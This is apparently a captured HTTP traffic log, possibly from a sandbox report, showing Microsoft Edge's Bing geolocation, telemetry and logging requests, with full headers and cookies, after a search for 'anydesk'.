Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-M4lKu1K0hAzgPk6hPwtA6knZq8c1P3Xox6unIcAUjzI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: C3B4F6EF44204FAAB357EF5321FD94DD Ref B: LON601060101042 Ref C: 2024-10-05T16:07:43Z
Content-Length: 0
Date: Sat, 05 Oct 2024 16:07:44 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:07:44 GMT; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.89777b5c.1728144463.188f0ac6
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149&EXLTT=1

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 25
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 6701644e95114822ab0bdce0f20172a1
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-YhcMCP67Itwzs5BoV1F0ETDettjxxigqvspiagTD1OE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 2A29037E19844C6DA48CF69D9529A4BF Ref B: LON601060108052 Ref C: 2024-10-05T16:07:42Z
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:07:42 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1&BLOCK=TS=241005160742; domain=.bing.com; expires=Thu, 30-Oct-2025 16:07:42 GMT; path=/; secure; HttpOnly; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144462.c94061
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461097%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461301%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461097%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461301%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.88777b5c.1728144463.c940c0
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}]

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.87777b5c.1728144462.8fa6f2d
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /fd/ls/lsp.aspx? HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 642
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.87777b5c.1728144463.8fa6f61
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144461382%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221812%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222054%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144461486%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144462452%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144461382%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221812%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222054%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144461486%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144462452%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; 